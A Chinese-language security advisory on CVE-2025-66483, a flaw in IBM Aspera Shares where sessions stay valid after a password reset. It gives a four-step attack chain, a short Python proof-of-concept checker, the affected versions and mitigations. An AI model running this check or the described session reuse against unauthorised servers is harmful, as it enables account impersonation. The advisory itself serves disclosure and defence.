CVE-2025-66483 IBM Aspera会话失效漏洞

漏洞信息

漏洞编号

CVE-2025-66483

漏洞类型

会话管理缺陷

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Aspera Shares

漏洞概述

IBM Aspera Shares 1.9.9至1.11.0版本存在安全漏洞，该漏洞源于应用程序在用户重置密码后未能使现有会话失效。这可能导致已认证的攻击者利用该漏洞，在密码重置后仍保持登录状态，从而冒充系统中的其他用户，造成机密性、完整性和可用性的影响。

技术细节

该漏洞的根本原因在于IBM Aspera Shares的密码重置逻辑中缺乏对现有会话令牌的失效处理机制。在标准的身份验证流程中，当用户执行密码重置操作时，系统应当销毁该用户所有活跃的会话ID，强制用户使用新密码重新登录。然而，受影响版本未实施此机制。因此，如果攻击者在受害者重置密码前已经获取了有效的会话Cookie（例如通过XSS或物理接触），或者攻击者本身就是拥有低权限账户的已认证用户并尝试接管其他账户，在密码重置后，攻击者持有的旧会话依然有效。这使得攻击者能够绕过新的身份验证检查，以原有用户的身份继续访问系统，实现用户冒充，进而导致数据泄露或未授权操作。

攻击链分析

STEP 1

步骤1：获取会话

攻击者通过低权限账户登录，或通过其他手段（如XSS）获取目标用户的Session ID。

STEP 2

步骤2：触发密码重置

攻击者触发密码重置流程（可能是自己重置，或者是管理员重置了受害者密码），改变了账户的认证凭证。

STEP 3

步骤3：复用旧会话

攻击者使用步骤1中获取的旧Session ID发送请求给服务器。

STEP 4

步骤4：冒充用户

由于服务器未在密码重置时使Session失效，攻击者成功通过验证，冒充受害者身份访问系统数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2025-66483
# This script demonstrates checking if a session remains valid after a password reset.

target_url = "https://target-aspera-server.com"
login_endpoint = f"{target_url}/login"
reset_endpoint = f"{target_url}/api/reset_password"
protected_resource = f"{target_url}/user/profile"

session = requests.Session()

# Step 1: Authenticate as a user
credentials = {"username": "victim_user", "password": "oldPassword"}
session.post(login_endpoint, data=credentials)
print(f"[+] Logged in. Session Cookie: {session.cookies.get_dict()}")

# Step 2: Simulate triggering a password reset (or admin reset)
# In a real scenario, this might involve sending a specific API request
reset_payload = {"user_id": "victim_user", "new_password": "newStrongPassword"}
reset_response = session.post(reset_endpoint, data=reset_payload)

if reset_response.status_code == 200:
    print("[+] Password reset request processed.")

    # Step 3: Attempt to access protected resource using the OLD session
    # If the vulnerability exists, the server accepts the old session cookie despite the password change.
    resource_response = session.get(protected_resource)

    if resource_response.status_code == 200:
        print("[!] VULNERABLE: The old session is still valid after password reset!")
        print(f"[!] Impersonation successful. Response: {resource_response.text[:100]}...")
    else:
        print("[-] Session invalidated correctly. Target is patched.")
else:
    print("[-] Failed to trigger password reset.")

影响范围

IBM Aspera Shares 1.9.9

IBM Aspera Shares 1.10.0

IBM Aspera Shares 1.11.0

防御指南

临时缓解措施

建议管理员立即检查系统日志，查找异常的密码重置活动。在官方补丁发布前，可考虑临时限制密码重置功能或手动重启服务以清除所有活跃会话。同时，强制所有用户在下次登录时更改密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66483
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66483
3 Details https://www.cvedetails.com/cve/CVE-2025-66483/
4 VulDB https://vuldb.com/cve/CVE-2025-66483
5 Link https://www.ibm.com/support/pages/node/7267848